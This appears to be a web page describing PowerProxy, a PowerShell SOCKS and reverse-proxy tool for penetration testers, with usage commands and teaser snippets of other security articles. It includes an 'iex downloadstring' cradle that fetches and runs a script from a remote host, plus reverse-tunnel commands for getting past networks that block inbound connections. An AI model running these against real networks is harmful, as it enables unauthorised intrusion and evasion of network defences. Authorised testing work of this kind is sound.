PowerProxy is a PowerShell SOCKS proxy with reverse proxy capabilities.
PowerProxy is written with penetration testers in mind. Reverse proxy functionality is a priority, for traversing networks that block inbound connections. Reverse proxy connections are encrypted by default. Username/Password authentication is supported for Socks 5 connections.
Import the script:
iex (new-object net.webclient).downloadstring(“http://192.168.0.22/PowerProxy.ps1”)
OR
Import-Module \192.168.0.22\Public\PowerProxy.ps1
reverse_proxy_handler.py can create temporary SSL certs, which requires OpenSSL. If OpenSSL isn’t installed on your machine (it is on most Linux/Unix-based systems), provide your own cert or use the –no-encrypt option.
For detailed usage, check out PowerProxy’s help, or use ./reverse_proxy_handler.py –help
On local machine, start the handler:
Listen for reverse proxies on port 8080. Clients connect to port 1080 (default)
./reverse_proxy_handler.py -p 8080
In PowerShell:
Start-ReverseSocksProxy 172.1.1.20 -Port 8080
Proxy clients can treat the server created by reverse_proxy_handler.py as if it were the actual SOCKS server:
curl –socks4 127.0.0.1:1080 http://10.10.2.69/
Run a traditional SOCKS server
Start-SocksProxy 172.10.2.20 -Port 9050
Use PSCredential objects to require a username and password:
Create the credential
$Password = ConvertTo-SecureString -AsPlaintext -Force “Passw0rd123”
$Cred = New-Object System.Management.Automation.PSCredential (“ProxyUser”, $Password)
Start-ReverseSocksProxy -Credential $Cred -Address 10.10.10.24 -Verbose
Introduction When it comes to cybersecurity and ethical hacking, one of the most effective ways…
Introduction In the world of cybersecurity, knowledge is power. One of the most powerful skillsets…
Introduction In the vast ocean of the internet, the most powerful tool you already have…
Pystinger is a Python-based tool that enables SOCKS4 proxying and port mapping through webshells. It…
Introduction When it comes to cybersecurity, speed and privacy are critical. Public vulnerability databases like…
Introduction When it comes to cybersecurity, speed and privacy are critical. Public vulnerability databases like…